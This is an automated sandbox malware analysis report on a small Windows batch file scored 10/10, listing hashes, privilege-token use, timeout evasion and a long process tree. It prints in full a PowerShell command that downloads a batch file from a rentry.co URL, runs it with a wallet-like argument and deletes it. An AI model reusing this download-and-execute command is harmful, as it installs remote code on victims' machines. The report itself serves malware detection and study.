4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
129s
max time network
126s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 03:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

310551118321648.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2136 powershell.exe

pid	process
2136	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
1588	timeout.exe
2892	timeout.exe
2596	timeout.exe
2316	timeout.exe
2788	timeout.exe
1060	timeout.exe
2788	timeout.exe
1440	timeout.exe
2904	timeout.exe
1600	timeout.exe
2640	timeout.exe
2936	timeout.exe
1768	timeout.exe
3016	timeout.exe
620	timeout.exe
2516	timeout.exe
1364	timeout.exe
2832	timeout.exe
2196	timeout.exe
1744	timeout.exe
2184	timeout.exe
768	timeout.exe
2156	timeout.exe
1688	timeout.exe
2384	timeout.exe
2936	timeout.exe
1628	timeout.exe
1844	timeout.exe
1620	timeout.exe
1088	timeout.exe
2564	timeout.exe
1100	timeout.exe
1356	timeout.exe
3056	timeout.exe
2456	timeout.exe
468	timeout.exe
1984	timeout.exe
3040	timeout.exe
2068	timeout.exe
1728	timeout.exe
2652	timeout.exe
2028	timeout.exe
332	timeout.exe
1300	timeout.exe
552	timeout.exe
760	timeout.exe
2172	timeout.exe
2392	timeout.exe
1756	timeout.exe
1600	timeout.exe
1916	timeout.exe
2188	timeout.exe
2096	timeout.exe
1664	timeout.exe
2680	timeout.exe
2660	timeout.exe
2844	timeout.exe
1936	timeout.exe
2424	timeout.exe
344	timeout.exe
2532	timeout.exe
2768	timeout.exe
448	timeout.exe
1552	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2136 powershell.exe

pid	process
2136	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeIncreaseQuotaPrivilege	2828	WMIC.exe
Token: SeSecurityPrivilege	2828	WMIC.exe
Token: SeTakeOwnershipPrivilege	2828	WMIC.exe
Token: SeLoadDriverPrivilege	2828	WMIC.exe
Token: SeSystemProfilePrivilege	2828	WMIC.exe
Token: SeSystemtimePrivilege	2828	WMIC.exe
Token: SeProfSingleProcessPrivilege	2828	WMIC.exe
Token: SeIncBasePriorityPrivilege	2828	WMIC.exe
Token: SeCreatePagefilePrivilege	2828	WMIC.exe
Token: SeBackupPrivilege	2828	WMIC.exe
Token: SeRestorePrivilege	2828	WMIC.exe
Token: SeShutdownPrivilege	2828	WMIC.exe
Token: SeDebugPrivilege	2828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2828	WMIC.exe
Token: SeRemoteShutdownPrivilege	2828	WMIC.exe
Token: SeUndockPrivilege	2828	WMIC.exe
Token: SeManageVolumePrivilege	2828	WMIC.exe
Token: 33	2828	WMIC.exe
Token: 34	2828	WMIC.exe
Token: 35	2828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2828	WMIC.exe
Token: SeSecurityPrivilege	2828	WMIC.exe
Token: SeTakeOwnershipPrivilege	2828	WMIC.exe
Token: SeLoadDriverPrivilege	2828	WMIC.exe
Token: SeSystemProfilePrivilege	2828	WMIC.exe
Token: SeSystemtimePrivilege	2828	WMIC.exe
Token: SeProfSingleProcessPrivilege	2828	WMIC.exe
Token: SeIncBasePriorityPrivilege	2828	WMIC.exe
Token: SeCreatePagefilePrivilege	2828	WMIC.exe
Token: SeBackupPrivilege	2828	WMIC.exe
Token: SeRestorePrivilege	2828	WMIC.exe
Token: SeShutdownPrivilege	2828	WMIC.exe
Token: SeDebugPrivilege	2828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2828	WMIC.exe
Token: SeRemoteShutdownPrivilege	2828	WMIC.exe
Token: SeUndockPrivilege	2828	WMIC.exe
Token: SeManageVolumePrivilege	2828	WMIC.exe
Token: 33	2828	WMIC.exe
Token: 34	2828	WMIC.exe
Token: 35	2828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2480	WMIC.exe
Token: SeSecurityPrivilege	2480	WMIC.exe
Token: SeTakeOwnershipPrivilege	2480	WMIC.exe
Token: SeLoadDriverPrivilege	2480	WMIC.exe
Token: SeSystemProfilePrivilege	2480	WMIC.exe
Token: SeSystemtimePrivilege	2480	WMIC.exe
Token: SeProfSingleProcessPrivilege	2480	WMIC.exe
Token: SeIncBasePriorityPrivilege	2480	WMIC.exe
Token: SeCreatePagefilePrivilege	2480	WMIC.exe
Token: SeBackupPrivilege	2480	WMIC.exe
Token: SeRestorePrivilege	2480	WMIC.exe
Token: SeShutdownPrivilege	2480	WMIC.exe
Token: SeDebugPrivilege	2480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2480	WMIC.exe
Token: SeRemoteShutdownPrivilege	2480	WMIC.exe
Token: SeUndockPrivilege	2480	WMIC.exe
Token: SeManageVolumePrivilege	2480	WMIC.exe
Token: 33	2480	WMIC.exe
Token: 34	2480	WMIC.exe
Token: 35	2480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2480	WMIC.exe
Token: SeSecurityPrivilege	2480	WMIC.exe
Token: SeTakeOwnershipPrivilege	2480	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2056 wrote to memory of 2136	2056	cmd.exe	powershell.exe
PID 2056 wrote to memory of 2136	2056	cmd.exe	powershell.exe
PID 2056 wrote to memory of 2136	2056	cmd.exe	powershell.exe
PID 2056 wrote to memory of 2256	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2256	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2256	2056	cmd.exe	cmd.exe
PID 2256 wrote to memory of 2828	2256	cmd.exe	WMIC.exe
PID 2256 wrote to memory of 2828	2256	cmd.exe	WMIC.exe
PID 2256 wrote to memory of 2828	2256	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2516	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2516	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2516	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2472	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2472	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2472	2056	cmd.exe	cmd.exe
PID 2472 wrote to memory of 2480	2472	cmd.exe	WMIC.exe
PID 2472 wrote to memory of 2480	2472	cmd.exe	WMIC.exe
PID 2472 wrote to memory of 2480	2472	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2640	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2640	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2640	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2964	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2964	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2964	2056	cmd.exe	cmd.exe
PID 2964 wrote to memory of 2920	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 2920	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 2920	2964	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2936	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2936	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2936	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 744	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 744	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 744	2056	cmd.exe	cmd.exe
PID 744 wrote to memory of 1968	744	cmd.exe	WMIC.exe
PID 744 wrote to memory of 1968	744	cmd.exe	WMIC.exe
PID 744 wrote to memory of 1968	744	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2456	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2456	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2456	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2756	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2756	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2756	2056	cmd.exe	cmd.exe
PID 2756 wrote to memory of 2772	2756	cmd.exe	WMIC.exe
PID 2756 wrote to memory of 2772	2756	cmd.exe	WMIC.exe
PID 2756 wrote to memory of 2772	2756	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2788	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2788	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2788	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 2808	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2808	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2808	2056	cmd.exe	cmd.exe
PID 2808 wrote to memory of 2020	2808	cmd.exe	WMIC.exe
PID 2808 wrote to memory of 2020	2808	cmd.exe	WMIC.exe
PID 2808 wrote to memory of 2020	2808	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 1628	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 1628	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 1628	2056	cmd.exe	timeout.exe
PID 2056 wrote to memory of 1964	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 1964	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 1964	2056	cmd.exe	cmd.exe
PID 1964 wrote to memory of 2008	1964	cmd.exe	WMIC.exe
PID 1964 wrote to memory of 2008	1964	cmd.exe	WMIC.exe
PID 1964 wrote to memory of 2008	1964	cmd.exe	WMIC.exe
PID 2056 wrote to memory of 2196	2056	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\310551118321648.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2480

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1968

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2772

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2020

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:288

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2360

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2120

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1188

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:536

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:664

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:284

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1676

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2252

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1516

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2848

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2140

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3048

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:828

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2176

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2300

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1392

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2320

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1520

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1764

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:772

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1428

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1852

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:868

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1724

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2836

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2508

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2432

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:2412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2896

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:864

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1792

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2076

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2648

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2288

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2180

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2676

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2728

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2840

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2952

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1992

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2620

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3008

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2484

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2464

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2920

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2964

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2000

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1040

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2772

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2756

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2020

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2808

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1952

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2016

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1996

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1208

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1188

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2120

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:664

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:536

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1676

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:284

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1388

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1260

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1280

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2296

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:828

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3048

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2300

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2176

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2320

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1392

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1764

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1520

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2548

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1912

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1920

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:708

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1752

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2792

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1560

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1644

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2276

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:352

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2948

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1580

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2192

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1584

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2716

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2080

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2180

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2624

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1992

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2952

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2256

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
